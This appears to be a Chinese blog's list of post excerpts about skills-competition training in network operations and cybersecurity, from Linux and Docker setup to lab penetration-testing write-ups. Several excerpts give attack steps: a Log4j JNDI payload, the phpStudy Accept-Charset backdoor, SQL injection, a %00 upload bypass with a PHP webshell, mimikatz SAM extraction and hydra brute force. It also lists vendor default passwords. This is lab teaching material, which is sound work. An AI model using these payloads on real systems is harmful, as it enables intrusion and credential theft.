网络安全、网络建设与运维竞赛资料培训请联系主页

原创 网络建设与运维神州昆泰安装Rocky Linux

默认BIOS密码：KunTai@2020 #批次不同密码可能也不同 比赛前请查看好避免出错。首先我们要熟悉基础的服务器，在比赛中我们使用的是 神州昆泰 R522-3 服务器。将home目录下的790g删除，保留90G 给/目录770G。这里我们可以使用独占VNC控制台来查看当前服务器的状态。在服务器正面电源处我们可以看见IBMC的默认网络设置。IBMC Web页面默认密码：Admin@123。IBMC Web页面默认账号：Admin。选择第一个磁盘，自定义安装。进行第二步选择Mini安装。

原创 网络建设与运维赛项0基础DNS服务配置

*说明：**过程中手动输入 yes 和密码即可，配置完成后各主机之间可以无密码登录。

原创 网络建设与运维KVM虚拟化virsh基础命令

disk path=/var/lib/libvirt/images/linux0.qcow2,size=40 path指定虚拟机磁盘路径 size指定磁盘文件大小为40G qcow2是一种快照的磁盘文件格式。virsh snapshot-create-as #虚拟机名称 快照名称 #创建快照！#快照就是保存当前虚拟机的状态创建了一个还原点 然后如果后续虚拟机出现了问题可以恢复到创建快照的时候。virsh snapshot-revert 虚拟机名称 快照名称 #恢复快照。

原创 职业技能大赛网络安全Server2131赛题解析

我们这里使用hackbar点击Enable Post Data发送post数据，这里需要传入一个参数c，其格式为￥{jndi:ldap://Kail_IP:ldap所监听的端口，这里为8899/id}在这里的shell中无法切换目录，我们使用ls列出，发现tomcat默认网站的主程序在webapps目录下，flag在webapps的目录下可以直接访问。这里考察的是Apache Lo4j2的漏洞利用，攻击的exp以及用到的文件都在/root/PoCs下。然后在PoCS目录下，使用命令。只需要记住命令的前缀。

原创 网络建设与运维Rocky Linux配置本地、网络yum源

项目BaseOSAppStream内容系统核心组件应用软件、数据库等更新频率稳定、少变动较频繁、模块化是否模块化否是是否可选版本否是（模块化）

原创 全国职工职业技能大赛网络与信息安全管理员理论试题

顶楼 D.除以上外的任何。理审计日志的数据形式。

原创 2025网络建设与运维技能大赛Linux部分CA服务器部署

CA（Certificate Authority，证书颁发机构）是负责签发和管理数字证书的机构。提供加密通信避免浏览器访问 HTTPS 出现“不受信任证书”警告实现内部服务的身份认证步骤内容安装 OpenSSL提供证书生成工具初始化 CA建立 CA 数据目录签发根证书CA 的身份凭证生成 CSR 请求模拟一个服务的证书申请签发用户证书有效期5年，支持通配符域名分发与信任将证书复制并追加到系统信任链中。

原创 2025年网络安全竞赛Server2129赛题解析

利用点将请求头中的Accept-Encoding的gzip，deflate中间的逗号去掉，不然执行命令不成功，请求头中的Accept-Charset后门就是要执行的命令，需要进行base64编码。接着我们使用burp珠宝将Accept-Encoding的gzip后面的空格去掉，添加Accept-Charset头部，内容为system（‘net user’）；Phpstudy后门事件很大影响版本phpstudy2016的5.4.45和5.2.17和2018版php-5.2.17还有5.4.45存在后门。

原创 世界职业院校技能大赛网络建设与运维Linux新手入门教程（保姆级）必看！

原创 2025 年福建省职业院校技能大赛网络建设与运维赛项Linux赛题解析

1.PC1 系统为 ubuntu-desktop-amd64 系统（已安装，语言为 英文），登录用户为xiao，密码为 Key-1122。在比赛时桌面或U盘中应存在soft文件夹,文件夹内包含了Ubuntu,rocky,kylin,windows等系统软件包或镜像，remmina软件包存在ubuntu文件夹中。4.PC1 系统为ubuntu-desktop-amd64 系统，登录用户为 xiao，密码 为Key-1122，配置该用户免密码执行sudo命令。默认登陆用户为xiao，密码为Key-1122。

原创 网络安全技能大赛B模块赛题解析Server12环境

题⽬⽤的应该是msssql数据库，他跟mysql数据库联合查询不同的是，mysql后查询可以不带表 名，⽽mssql数据库后查询必须带上表名。在shopxp⽹站中，默认的管理员表叫shopxp_admin。FLAG： 7a57a5a743894a0e 或 解密后的 admin。使用nmap扫描目标靶机网站服务的端口号为8089。

原创 网络安全职业技能大赛Server2003

将sam.hive和system.hive文件复制到win7的c盘根目录然后使用mimikatz工具提取。使用nmap扫描发现目标靶机开放端口232疑似telnet直接进行连接测试成功。

原创 2025山东省职业院校技能大赛网络安全赛项样题

通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试，使用kali中hydra对服务器Telnet服务进行暴力破解（用户名为teltest），将hydra使用的必要参数当做FLAG进行提交（例：nmap-s-p 22）；（字典路径/usr/share/wordlists/dirb/small.txt）通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试，取得的账户密码有远程桌面权限，将该场景系统中sam文件使用reg相关命令提取，将完整命令作为FLAG提交；

原创 江苏省职业院校技能大赛网络建设与运维服务部分Linux赛题解析2025

为保障企业网络服务的加密功能，提供证书服务并配置 CA 服务器，使用 Linux-1、Linux-2、Linux-3 三台主机模拟配置并测试。bash复制编辑scp /etc/chrony.conf /chrony.conf。bash复制编辑mkdir -p /etc/pki/CA/private。bash复制编辑vim /etc/chrony.conf。bash复制编辑# 修改 /etc/hosts 文件。bash复制编辑ssh-keygen -t rsa。# 编辑 /etc/sudoers。

原创 2025 年职业院校技能大赛网络建设与运维赛项Docker赛题解析

(九)在Windows2中完成docker部署 1. 在Windows2 上安装docker，导入NanoServer镜像；2. 创建名称为web的容器，映射Windows2的8080端口至容器80端口，容器启动后运 行cmd命令，保持容器处于运行状态。部署到Windows Server 2022中。

原创 2023 年河南省中等职业教育技能大赛网络建设与运维项目比赛试题

模块三：服务器配置及应用项目（450分）【说明】（1）云平台1.0登录方式http://192.168.100.100/dashboard/；账户：admin 域：default 密码：dcncloud。（2）云平台2.0登录方式http://192.168.100.100/dcncloud/；账户：admin， 使用管理员登录，密码：dcncloud。（3）云平台镜像Linux系统，默认账户：root默认密码：Pass-1234；Windows 系统,默认账户：administrator默认密码：Pass

原创 2025 年江苏省职业院校技能大赛网络建设与运维赛项Docker赛题

(九)在Windows2中完成docker部署 1. 在Windows2 上安装docker，导入NanoServer镜像；2. 创建名称为web的容器，映射Windows2的8080端口至容器80端口，容器启动后运 行cmd命令，保持容器处于运行状态。

原创 2025年河南省职业院校技能大赛网络建设与运维赛题

（3）申请并颁发一张供 linux服务器使用的证书为2023China.crt，私 钥为2023China.key，存放在/etc/pki/tls 目录，证书信息：有效期=5 年，公用名= China-hbds.cn，国家=CN，省=XX，城市=XX，组织=hbds， 组织单位=system，使用者可选名称=*.China_hbds.cn 和 China_hbds.cn。私钥文件存放于/etc/pki/CA/private目录，CA私钥文件名为Ca_key.pem；关闭TCPKeepAlive功能。

原创 中职网络建设与运维ansible服务

填写hosts指定主机范围和控制节点后创建一个脚本，可以利用简化脚本。

原创 2024年河南省职业院校技能大赛网络建设与运维样题

# （2）所有linux 主机之间（包含本主机）root 用户实现密钥ssh 认证， 禁用密码认证，登录时禁用连接提示，关闭TCPKeepAlive功能，客户端不活跃超时设置为60秒，Shell超过10分钟不响应则断开连接。dodone禁用密码认证登录时禁用连接提示关闭TCPKeepAlive功能客户端不活跃超时设置为60秒Shell超过10分钟不响应则断开连接。

原创 2024年山东省职业院校技能大赛网络建设与运维X86架构与ARM架构搭建赛题

1.PC1 系统为 ubuntu-desktop-amd64 系统（已安装，语言为英文），登录用户为 ubuntu，密码为Key-1122。1.从 U 盘启动PC2，安装kylin-desktop-arm64（安装语言为英文），安装时创建 用户为kylin，密码为Key-1122。配置kylin用户能免密使用sudo命令。2.新增 harry 用户，用户harry 无权访问系统上的交互式shell且不是sysmgrs成 员，密码为Key-1122，为harry用户添加备注SDskills1。

原创 2024年山东省职业院校技能大赛网络建设与运维正式赛题

1.qcow2 至 linux3-4.qcow2）创建 lvm 卷，卷组名为 vg1，逻辑卷名为 lv1，容量为全部空间，格式化为 ext4 格式。、 “Evidence 10”，有文本形式也有图片形式，不区分大小写），并按关键字的顺序填写相关信息，取证的类型包含在已删除的、受损的文件找到隐藏的关键字，或者关键字隐藏在目标文件中。=CN，省= Shandong，城市= Jinan，组织=sdskills， 组织单位=system，使用者可选名称=*.sdskills.lan 和 sdskills.lan。

原创 网络建设与运维23国赛网络运维正式赛题解析

创建完成之后分离接口并连接接口IP地址为10.4.210.110我这里是10.1.210.110。先去vnc查看IP地址是否正确若是无法获取到题目要求的IP地址连接接口后重启一下系统即可。任务描述：某集团公司在更新设备后，路由之间无法正常通信，请修 复网络达到正常通信。我这里的IP是10.1.210.110 实例类型使用windows的实例类型即可。然后访问web网页进行登录选择html console。

原创 Linux vim编辑器常用知识

Vim 是 Linux 中一个强大的文本编辑器，以其高效的键盘操作和丰富的功能而闻名。

原创 中职网络安全B模块渗透测试Linux20210510

使用hacker账号登录发现无法使用sudo，成功提权是需要sudo权限才可以，那么这里指的恶意用户不是hacker，查看passwd文件存在其他用户，并且该用户存在username.txt中那么使用passwd进行爆破。2. 将服务器中 tmp 文件夹下的字典下载至本地，并将字典中最后一位用户名作为 flag 提交；5. 在服务器中登录恶意用户，查看恶意用户在服务器中输入的第一条指令，将指令作为 flag 提交；6. 在服务器中查看用户信息，将最后一个用户的用户名作为 flag 提交；

原创 中职网络安全B模块Cenots6.8数据库

密码：root）， 进入 mysql 数据库，查看所有用户及权限，找到可以从任意 IP 地址访问的 用户，将该用户的用户名作为 flag 提交；密码：root）， 进入 mysql 数据库，改变默认 mysql 管理员的名称，将系统的默认管理员 root 改为 admin，防止被列举，将操作命令作为 flag 提交。密码：root）， 进入 mysql 数据库，查看所有用户及权限，找到可以从任意 IP 地址访问的 用户，使用 drop 命令将该用户删除，将操作命令作为 flag 提交。

原创 中职网络安全B模块渗透测试Server21

5.访问服务器⽹站⽬录5，根据⻚⾯信息完成条件，将获取到的flag提交;1.访问服务器⽹站⽬录1，根据⻚⾯信息完成条件，将获取到的flag提交;2.访问服务器⽹站⽬录2，根据⻚⾯信息完成条件，将获取到的flag提交;3.访问服务器⽹站⽬录3，根据⻚⾯信息完成条件，将获取到的flag提交;4.访问服务器⽹站⽬录4，根据⻚⾯信息完成条件，将获取到的flag提交;6.访问服务器⽹站⽬录6，根据⻚⾯信息完成条件，将获取到的flag提交;使用1’ or 1=‘1闭合id得到flag。

原创 中职网络安全wire0077数据包分析

SMTPDESKTOP-M1JC4XX_2020_09_24_22_43_12.zipDESKTOP-M1JC4XX_2020_09_24_23_02_08.jpeg24 Sep 2020 23:02:09 +0000WorkingFoler-Shortcut

原创 中职网络安全Server2216

黑客通过网络攻入本地服务器，通过特殊手段在系统中建立了多个异常进程，将恶意脚本的源文件所在的绝对路径作为Flag值提交;黑客在服务器某处存放了多个木马程序，请你找到此木马程序并清除木马，将木马建立连接所使用的端口号作为。只显示文件头和文件尾，因为文件头记录了开始，文件尾部记录了结束的最后一次攻击，所以筛选头和尾。黑客攻入本地服务器，请你找出黑客成功暴力破解服务器的具体时间，将暴力破解的时间范围作为。通过题目寻找异常脚本，脚本一般需要定时执行权限，所以进入定时任务目录查看定时任务。

原创 中职网络安全B模块渗透测试system0016

我们上传的文件名为1.png保存的路径为/uploads/1.php%00 接着我哦们鼠标选中%%00右键选择Convert selection >URL>URL-docode进行解码，因为这里我们要输入不可见字符，而可见字符是不能输入的，由于不可见字符00的url编码为%00，因此我们需要%00进行一个解码，就是一个不可见字符了。我们需要查看访问过程的是web2并不是web2/idnex.html，index是加载之后的所以查看web2的访问过程发现了flag。题目的意思是网页的访问过程中有猫腻。

原创 中职网络安全B模块渗透测试server2380

那么我们自行创建一个user和passwd的简易字典进行跑取密码 跑到了（此步骤可省略）scp 用户名@靶机ip/:图片路径 本地存放路径。进行登录uname -a。

原创 中职网络安全B模块渗透测试server2003

将sam.hive和system.hive文件复制到win7的c盘根目录然后使用mimikatz工具提取。使用nmap扫描发现目标靶机开放端口232疑似telnet直接进行连接测试成功。

原创 U盘烧录工具 ventoy Windows版本 系统启动盘制作神器 多合一

其中第1个分区（就是容量大的那个分区，也可以称之为 镜像分区）将会被格式化为exFAT文件系统（你也可以再手动重新格式化成其他支持的文件系统，比如 NTFS/FAT32/UDF/XFS/Ext2/3/4 等，参考。右侧显示的 MBR/GPT：设备当前使用的分区格式 （也就是当初安装Ventoy时选择的分区格式），如果U盘内没有安装Ventoy，则会显示空。左侧显示的 exFAT/NTFS/FAT32：用户当前选择的Ventoy分区文件系统类型，可以在选项中修改，只对安装过程有效。

原创 ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统

旨在快速侦察与目标关联的互联网资产，构建基础资产信息库。协助甲方安全团队或者渗透测试人员有效侦察和检索资产，发现存在的薄弱点和攻击面。ARL删库后，备份项目使用到ARL-NPoC、arl_files等项目，无法跑通，大多数人使用docker运行ARL，docker镜像同样被删除，无法拉取镜像，需要修改安装脚本调试环境。

原创 Centos7.0搭建docker+vulhub靶场

10、设置国内源加速，设置完成后重启docker。11、安装docker-compose以及加权限。8、查看docker系统版本，验证是否安装成功。12、安装vulhub靶场下载压缩包。15、进入测试漏洞目录，开启靶机。5、使用阿里docker源。13、把压缩包方在dio中。16、安装环境，开启靶机。2、重建yum源缓存。7、安装docker。unzip 压缩包名。

原创 中职网络安全Linux系统安全

1.通过本地PC中渗透测试平台Kali对服务器场景PYsystem0025进行系统服务及版本扫描渗透测试，并将该操作显示结果中22对口对应的服务的端口状态信息字符串作为Flag值提交；由于靶机开放了80端口，我们只需要进入/var/www目录，将图片文件复制到/var/www/html目录中，再在网站访问图片就可以。我们还不知道他的账号和密码，但是通过nmap扫描，发现了80端口还是开放的，我们访问一下靶机的80端口。得到账号和密码了，但是需要我们进行端口敲门，敲击2222，3333，4444端口。

原创 中职网络安全中间件渗透测试Server2129

利用方法：将请求头中的Accept-Encoding的gzip， deflate中间逗号后面的空格去掉，不然命令执行不成功，请求头中的Accept-Charset后门就是要执行的命令，但是需要进行base64编码（这个漏洞相当于eval()函数的代码执行，所以如果要执行os系统命令的话还要用system）6.找到靶机Server2129中的C:\flag.txt文件，将文件按的内容作为Flag值提交；找到回收站的文档，将回收站内的文档进行还原，然后在桌面打开这个文档就可以了。

原创 中职网络安全Linux操作系统渗透提权-Server2214

4.使用渗透机对服务器管理员提权，并将服务器root目录下文本内容作为flag提交；1.使用渗透机对服务器信息收集，并将服务器中ssh服务端口号作为flag值提交；查看hacker用户输入的历史命令也发现使用了find命令执行root权限命令。3.使用渗透机对服务器信息手机，并将服务器中系统内核版本作为flag提交；5.渗透机对服务器管理员提权，并将服务器中root的密码作为flag提交；2.使用渗透机对服务器信息手机，并将服务器中主机名称作为flag值提交；发现可以使用find命令执行root权限命令。

原创 中职网络安全web安全应用match_win03-3-1

2.使用渗透机Kali Linux，访问靶机Http服务，使用文本反馈功能上传PHP一句话木马（shell.php)，并将上传后提示唯一一行JavaScript代码作为Flag值提交。在“代理”中，需要修改文件属性，不然上传不上去，靶机进制上传php文件，我们把php文件属性修改成text/plain的txt文件属性，再放行就上传成功了。4.使用渗透机Kali Linux，访问靶机Http服务，通过一句话木马获取靶机C盘根目录下flag.txt中的内容，并将文本中的内容作为Flag值提交。

原创 中职网络安全Web安全应用

发现是一个播客，我们使用web网站目录爆破工具dirb扫描网站，试一试能不能爆破出网站后台。下载下来之后，上传到/var/www/html目录中，然后开启apache2服务。5.找到/root目录中txt文件，将文件内容作为Flag值提交。1.获取PHP的版本号作为Flag值提交:（例如:5.2.14)我们登录网站后台使用的弱口令，admin用户的密码为：admin。如果要获取系统内核版本号，我们需要执行系统命令，获取内核版本号。4.获取网站后台管理员admin用户的密码作为Flag提交；